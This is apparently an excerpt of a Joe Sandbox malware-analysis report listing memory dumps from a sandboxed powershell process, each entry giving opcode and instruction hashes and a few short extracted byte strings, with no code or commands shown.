                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b02e19cfbd8eeba2975137cdb86c875022c35ab357a3be6b64e1ddf3ca601a93
                                                                                          • Instruction ID: 478ae1a4395d04d3c38ff54f03ef4188e99a1ebd9c1f32a68ea7c53bbd2a0557
                                                                                          • Opcode Fuzzy Hash: b02e19cfbd8eeba2975137cdb86c875022c35ab357a3be6b64e1ddf3ca601a93
                                                                                          • Instruction Fuzzy Hash: DBE15DB4A00215DFDB14CF58C950FAAB7B2AF8A314F14C1AAD915AB755C732EC81CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbbb6cbfecf10c4d1aa52118d47ad4f39d2a1f4fa85efb0a4a6eb753f15a2602
                                                                                          • Instruction ID: 8a77740ae0557d99dde8c0e55818ea5404ebe34fa1824fe7d977fcfa76a34521
                                                                                          • Opcode Fuzzy Hash: fbbb6cbfecf10c4d1aa52118d47ad4f39d2a1f4fa85efb0a4a6eb753f15a2602
                                                                                          • Instruction Fuzzy Hash: EED13C34A00228EFDB19CF98D584A9DFBB2FF88310F248159E445AB361D775ED82CB94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f7af38f71655b9a5c4d3878171214bee9a80e60d11392b3b5084be621d8de6af
                                                                                          • Instruction ID: b700f3d80f5d957041e6a3d85fc61aaa0a78106684a290ae5aff86849debdf27
                                                                                          • Opcode Fuzzy Hash: f7af38f71655b9a5c4d3878171214bee9a80e60d11392b3b5084be621d8de6af
                                                                                          • Instruction Fuzzy Hash: 21C1BB75B002189FDB14DFA5C684AADBBF2FF85310F158568E406AF764CBB4AE49CB40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fb402631e15d6eaf74f3efcb9f9653349f24338a42fed87edb76da9095a1e78e
                                                                                          • Instruction ID: e586439dce81b34a654f7d42c8241219846f60f8d6b1169a61dff3187b42c094
                                                                                          • Opcode Fuzzy Hash: fb402631e15d6eaf74f3efcb9f9653349f24338a42fed87edb76da9095a1e78e
                                                                                          • Instruction Fuzzy Hash: 5DB17170E0022DCFDB14CFA9D98579EBBF2BF48304F148529E815AB254EBB4A945CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cfe608d9a854ae6c54ccfcc2653088eedd5bfb83fe201f60fbe1960f246cf846
                                                                                          • Instruction ID: 78e1d6c75d18c0a2047a651b27b27118b0c70e6830b88a376bf019037d898950
                                                                                          • Opcode Fuzzy Hash: cfe608d9a854ae6c54ccfcc2653088eedd5bfb83fe201f60fbe1960f246cf846
                                                                                          • Instruction Fuzzy Hash: 91B17DB4F002059FE714DB65C954BAAB7F2AFC9304F108069E515AF795CB71EC42CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 45c52888a2b49887268e0534316914832e2d269c4dcb0690d3346ced0b8d36ab
                                                                                          • Instruction ID: 91d807ff27a19609a222358b55fb8e374dc1c301d432abe2dbb4cd14e31e839a
                                                                                          • Opcode Fuzzy Hash: 45c52888a2b49887268e0534316914832e2d269c4dcb0690d3346ced0b8d36ab
                                                                                          • Instruction Fuzzy Hash: 38B1AE70E0022DDFEB10DFA8D98179DBBF2BF48714F14852DD814AB254EBB4A941DB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2cb51ad00d1317a1f09d5ab63da7281f2528a8afb361a3178ff969cd32d376a
                                                                                          • Instruction ID: 752263977771207b85812fe052b3ca4a4f202fd25102abe2d7b5ca04ef6429e7
                                                                                          • Opcode Fuzzy Hash: a2cb51ad00d1317a1f09d5ab63da7281f2528a8afb361a3178ff969cd32d376a
                                                                                          • Instruction Fuzzy Hash: 93A1ADB4E013049FDB14DB65C950BAAB7F2AF8A304F148069E411AF791CB72EC81CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 490053e6cb44ba339f5894cde20c38ba916ee48e32d07fab1653453dafc80353
                                                                                          • Instruction ID: 8b5ff8c643dac5094801024763c131a475353ac99276b2ceec7ee49370fdf361
                                                                                          • Opcode Fuzzy Hash: 490053e6cb44ba339f5894cde20c38ba916ee48e32d07fab1653453dafc80353
                                                                                          • Instruction Fuzzy Hash: 57819E30A01214DFCB15DFA4C9849ADBBF2FF89310F1885A9E4459B762CB75ED85CB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b099d76e27cb329b424f1d05933cb21b4d3ae82610cad668c281434aca7f990d
                                                                                          • Instruction ID: 36d3b6f3cd7705701a7a202db104ddc9c956b7fe037e3be006c82026d4f157c4
                                                                                          • Opcode Fuzzy Hash: b099d76e27cb329b424f1d05933cb21b4d3ae82610cad668c281434aca7f990d
                                                                                          • Instruction Fuzzy Hash: 9F71AE70A00319DFCB24DF68C984A9DBBF2FF85314F148569E41AEB651DBB1AC46CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6a4c4bfede1f88f5f8615a6348e42faca459b054e838a458478dd560362390a1
                                                                                          • Instruction ID: e2527dcc56d5faec7836dc39e377ead79f652b22a0a000b9082c2fe586fdfd0c
                                                                                          • Opcode Fuzzy Hash: 6a4c4bfede1f88f5f8615a6348e42faca459b054e838a458478dd560362390a1
                                                                                          • Instruction Fuzzy Hash: EC715B70E00218DFDB18DFA5D580BADBBF2BF88314F148429D416AB790DB75AD46CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 289f941dd1398a8d9317ee843652bf29715c16d61c0fe031fd5ab181ff241230
                                                                                          • Instruction ID: b475781f73bb3654a9d28f492f4f0a7ac219352d331b104396cdeecfb07398c7
                                                                                          • Opcode Fuzzy Hash: 289f941dd1398a8d9317ee843652bf29715c16d61c0fe031fd5ab181ff241230
                                                                                          • Instruction Fuzzy Hash: E0718A70D0021D8FDF24CFA9C981B9EBBF2AF48314F14812DE415AB254DBB4A942DF95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 440d044924c4c382a87cb51c9f5309e2ef8423df59f71ffd53d187ff8e68e559
                                                                                          • Instruction ID: 0b7f7842b26b52f78dcac4b8b46c90027b2a2ff4dc701762d6b5103de70f7887
                                                                                          • Opcode Fuzzy Hash: 440d044924c4c382a87cb51c9f5309e2ef8423df59f71ffd53d187ff8e68e559
                                                                                          • Instruction Fuzzy Hash: 24716970E0021D9FEF24CFA9C98079EBBF2AF88314F14812DE415A7254EBB4A941DF95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23adf37e6e1a76a8b5c7310c30a9c45999876d529c0f1e6d40155bd4964ddc4c
                                                                                          • Instruction ID: eefa05fd01d778914440bedbe6abce1ecc5dc2310bdf0379a633dd9129a6c0a6
                                                                                          • Opcode Fuzzy Hash: 23adf37e6e1a76a8b5c7310c30a9c45999876d529c0f1e6d40155bd4964ddc4c
                                                                                          • Instruction Fuzzy Hash: 8A41E4F5B04302AFCB158F298940AAE77B2ABC2258B15C0A6D921CF651D735D981CFA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab207dc09538d9e68d5b890043046bce456901e8610a8c4590764ab657883106
                                                                                          • Instruction ID: d1a5c7c22cf50568f249054aaed5c0e31166eb3a311bac18ea62dac38c3c43cc
                                                                                          • Opcode Fuzzy Hash: ab207dc09538d9e68d5b890043046bce456901e8610a8c4590764ab657883106
                                                                                          • Instruction Fuzzy Hash: C2417C31B003508FDB18EF64C998AA97BB7EF89710F184068E806EB7A0CB75AC01CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8fa36db8853c4d28ada2d9394205ddd4d577755b2eed93ad934b5a3c83cb9461
                                                                                          • Instruction ID: 025cf5d0a85adcedecfe0acfda32a211a364a1770cb4ddecc7c95931b56071e3
                                                                                          • Opcode Fuzzy Hash: 8fa36db8853c4d28ada2d9394205ddd4d577755b2eed93ad934b5a3c83cb9461
                                                                                          • Instruction Fuzzy Hash: 2841BE70E00318DFDB18DFA9C9847ADBBF2BF85310F148528D016AB794DBB5A846CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64a8f35d433351c24436148278d11223fdc48239aae34d89c64630668fbd2c36
                                                                                          • Instruction ID: 6c9e028850f393692f596b1dbb5f36b0c8a27e067c23602f8beffd2d3f706373
                                                                                          • Opcode Fuzzy Hash: 64a8f35d433351c24436148278d11223fdc48239aae34d89c64630668fbd2c36
                                                                                          • Instruction Fuzzy Hash: 85417974A00655DFCB19CF68C594AAAFBB2FF48310B128169D805AB364C336FC91CBA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 886eabfb0dc59d2089acc7acdd5789e29ed5ff1b3fa25a6aba2bba45b58873ea
                                                                                          • Instruction ID: 273b6728b4e5d662aa7faaafeaf6d73338eacaa47e752931e5aa32fdcb001c13
                                                                                          • Opcode Fuzzy Hash: 886eabfb0dc59d2089acc7acdd5789e29ed5ff1b3fa25a6aba2bba45b58873ea
                                                                                          • Instruction Fuzzy Hash: 7B319F74B00314AFE314ABA0C854FAE77B3ABC6348F50C425E9116FB95CE75EC428BA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c7f1696e88c0684d303fe910635618f407a5a856efd52aeea0e640628d2c6bd8
                                                                                          • Instruction ID: ba9c86f085d1b7f729095a8a04b4122b5f696cff6cd4b9761e451c96f71ecff0
                                                                                          • Opcode Fuzzy Hash: c7f1696e88c0684d303fe910635618f407a5a856efd52aeea0e640628d2c6bd8
                                                                                          • Instruction Fuzzy Hash: 7A2179F2304349AFE7244B659C00B77BBA6AFC2714F188427E954CB2C1CA7AD984C365
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a5b2e227549923669353610a18623973ff4cc681587cee655339a33b1374a164
                                                                                          • Instruction ID: 22fc06867bd42a564db462f40294745690f10471c8b7fda351126c7bb4aad8e6
                                                                                          • Opcode Fuzzy Hash: a5b2e227549923669353610a18623973ff4cc681587cee655339a33b1374a164
                                                                                          • Instruction Fuzzy Hash: AC2135B270031AABD72456BA9C50B3BB696ABC5714F28842AE555CB280DA75C980C364
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 885881d5a77f898ab9b07ebc7106bc29052d44efc4c6f4d69b973738a4f029cc
                                                                                          • Instruction ID: f4ebe30e6f9b51b6572cdb7d57d954cfd143f2d2b67f78f7aa02281eb60304b5
                                                                                          • Opcode Fuzzy Hash: 885881d5a77f898ab9b07ebc7106bc29052d44efc4c6f4d69b973738a4f029cc
                                                                                          • Instruction Fuzzy Hash: 98310E34A04128CFCB25DB64C9946EEB7B2BF89304F1044E9D40AAB351DF75AE95CF81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 617a9a29fc1c03e20e1750c9b54aadd39ccad634abfd64a97a3b92786ed658ae
                                                                                          • Instruction ID: 912e1a8b85c1197929c3a3fc0461f65c16132b093f76d4f726fece4d2c4d5ebc
                                                                                          • Opcode Fuzzy Hash: 617a9a29fc1c03e20e1750c9b54aadd39ccad634abfd64a97a3b92786ed658ae
                                                                                          • Instruction Fuzzy Hash: DF31C274A04696DFCB01CF58C494AAAFBF1FF49310B1541AAD848EB362C334EC41CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d688a7b0bc527103a8230c048af32c970da7a7654e4e715a0c9962d5d068bc33
                                                                                          • Instruction ID: 5fe93de7e439bc64cfcd602a37ca12d6a2f6f9839e98df7f869aef3f2af0b933
                                                                                          • Opcode Fuzzy Hash: d688a7b0bc527103a8230c048af32c970da7a7654e4e715a0c9962d5d068bc33
                                                                                          • Instruction Fuzzy Hash: 7D116B773083D29FC712875AEC006A3BFA8DFC3121F1880BBE4A4CB152C2259856C371
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3eedb07491f39e3f80a400fdf67c79c05e1fc00948d622abf3d1a2e6f88bd081
                                                                                          • Instruction ID: 64e8665d8890c30f087648c03294f4681fbd2db038932688c9aec30e983f97b1
                                                                                          • Opcode Fuzzy Hash: 3eedb07491f39e3f80a400fdf67c79c05e1fc00948d622abf3d1a2e6f88bd081
                                                                                          • Instruction Fuzzy Hash: 8A012B7631031A8BC724566ADC0057BF7AADFC1622F18C43FE569CB250D632C845C760
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 978a0235e787cc1e9f8e6205abb7fd581805de1488a62add4c5ae787f4995603
                                                                                          • Instruction ID: 722930ba4406435d726eef2028dd1845d0e6bbc4511045d56efbc9300219c193
                                                                                          • Opcode Fuzzy Hash: 978a0235e787cc1e9f8e6205abb7fd581805de1488a62add4c5ae787f4995603
                                                                                          • Instruction Fuzzy Hash: 9211E938D0026CDBEF34DA98DA947ECBB72AF4431DF54142EC001B6190EBB46AC5EB15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3fabbde8f4abbc4435de26b37726357e07127f74f8232fa7dd3324108a843c59
                                                                                          • Instruction ID: 24027d0d464bb5deb849729f64738ad88843359889e3dfa5d5fb3c8012da9628
                                                                                          • Opcode Fuzzy Hash: 3fabbde8f4abbc4435de26b37726357e07127f74f8232fa7dd3324108a843c59
                                                                                          • Instruction Fuzzy Hash: C93189387006558FC755DB79C4848AABBF6FF8A61035445AAE042CBB72DB70EC09CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                                                                          • API String ID: 0-4104424984
                                                                                          • Opcode ID: 9ab687180afc23dd3fe62b58d81ecf6805290be9a4aac576a775f69e68921e04
                                                                                          • Instruction ID: 6d079f854a2157ad3153fec10cf32cfdf5d873df48728ce5ecf10987813b3e14
                                                                                          • Opcode Fuzzy Hash: 9ab687180afc23dd3fe62b58d81ecf6805290be9a4aac576a775f69e68921e04
                                                                                          • Instruction Fuzzy Hash: 8AA128B1B043168FDB258B299D5076A7BB1FFC2211F1480BBD425CF2D1DA35D882CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                                                                                          • API String ID: 0-2432477355
                                                                                          • Opcode ID: 8a3709eac4b056241abf68b2178aa7f18815c03fa1dc8e5c068c49f5eea80795
                                                                                          • Instruction ID: f695091ac97cd230b79b69b435d26a127a517819031174e0d1cea1a83a199e38
                                                                                          • Opcode Fuzzy Hash: 8a3709eac4b056241abf68b2178aa7f18815c03fa1dc8e5c068c49f5eea80795
                                                                                          • Instruction Fuzzy Hash: 09F148B2B043169FDB248B699C116ABBBF2AFC6221F14C07BD425CF651DB31D846C7A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                          • API String ID: 0-1721289453
                                                                                          • Opcode ID: 9269974968ed7f2c3cdcc88fdf3cba523b9bc682bce311b7c0c41ce73d97357e
                                                                                          • Instruction ID: 949cedb90ab055dea8547442c9ac988cd96ba4bae81ae2f65bbd8c3583d66fee
                                                                                          • Opcode Fuzzy Hash: 9269974968ed7f2c3cdcc88fdf3cba523b9bc682bce311b7c0c41ce73d97357e
                                                                                          • Instruction Fuzzy Hash: 02C1F3B2B0031A9FDB249B69DC407AAB7F2BFC6211F14807BD565CB281DB31D946C7A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$tPq$tPq$$q$(q$(q$(q
                                                                                          • API String ID: 0-3442133670
                                                                                          • Opcode ID: 7734f39c5de3e425e2dd5dbd40b81b5e0bbc93c8ecb7e3b742be7a0a3a31133c
                                                                                          • Instruction ID: c89b09db0e8d8092d72981d630ba4b55680c557f80f47cf043c6ee24a77ac5cb
                                                                                          • Opcode Fuzzy Hash: 7734f39c5de3e425e2dd5dbd40b81b5e0bbc93c8ecb7e3b742be7a0a3a31133c
                                                                                          • Instruction Fuzzy Hash: 93718DB1B002069FDB24CF15C941BAAB7F6BF85711F1984AAE8656F391C731DC80CB61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$tPq$tPq$$q$(q$(q$(q
                                                                                          • API String ID: 0-3442133670
                                                                                          • Opcode ID: 09b8ceb7a5e31158eb5b75bcd08705f86c3dbb9fd10e430eecbffcfcb337811a
                                                                                          • Instruction ID: 535af30fa510b663ef3354830dd7924a3afedb1305c7e7be5d1058c23a02c5eb
                                                                                          • Opcode Fuzzy Hash: 09b8ceb7a5e31158eb5b75bcd08705f86c3dbb9fd10e430eecbffcfcb337811a
                                                                                          • Instruction Fuzzy Hash: 8B617CB1B00206DFDB24CF15C941BAAB7F6BF85711F1984AAE8656B391CB31DC80CB61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
                                                                                          • API String ID: 0-2980145124
                                                                                          • Opcode ID: 269f4e9d81bc0b86c75a3e932a209a111cab0f97ec21d813a04d82528bccefdd
                                                                                          • Instruction ID: 1207b4650abc407c0143b7ea68a958e8b6cb4c8b3ab40c6edb361d4c5dc549f4
                                                                                          • Opcode Fuzzy Hash: 269f4e9d81bc0b86c75a3e932a209a111cab0f97ec21d813a04d82528bccefdd
                                                                                          • Instruction Fuzzy Hash: 4251AFF0710606DFDB248F14DD457AAB7B2BF85315F59C4AAE8299B291C731EC80CB92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
                                                                                          • API String ID: 0-2980145124
                                                                                          • Opcode ID: 1d9ceedc9a273f0d941c6a6b60e3e8f59a1f13327cbdc1f41280546d62e6b88d
                                                                                          • Instruction ID: f53605efd4d8dc7e577bbb1f5efd107b860f4055063e49486913e8465dd4d618
                                                                                          • Opcode Fuzzy Hash: 1d9ceedc9a273f0d941c6a6b60e3e8f59a1f13327cbdc1f41280546d62e6b88d
                                                                                          • Instruction Fuzzy Hash: ED5190F071060ADFDB248F05DD057A6B7B2BF85315F59C4A6E8299B290C771ED80CBA2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $q$$q$$q$$q$$q$$q
                                                                                          • API String ID: 0-2069967915
                                                                                          • Opcode ID: e40cbca53716d793419b406b3b12769265dd0e5cffd520b9289090e10e637b0f
                                                                                          • Instruction ID: 45216dc979b0355d2cd3b4d7c15b58477d5dce91e03f01872d1beb63e0ac9266
                                                                                          • Opcode Fuzzy Hash: e40cbca53716d793419b406b3b12769265dd0e5cffd520b9289090e10e637b0f
                                                                                          • Instruction Fuzzy Hash: F9514AF2B043168FD7258B6A9C5967BB7B5EFC2210F18807BD425CB242DA3DC845C3A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
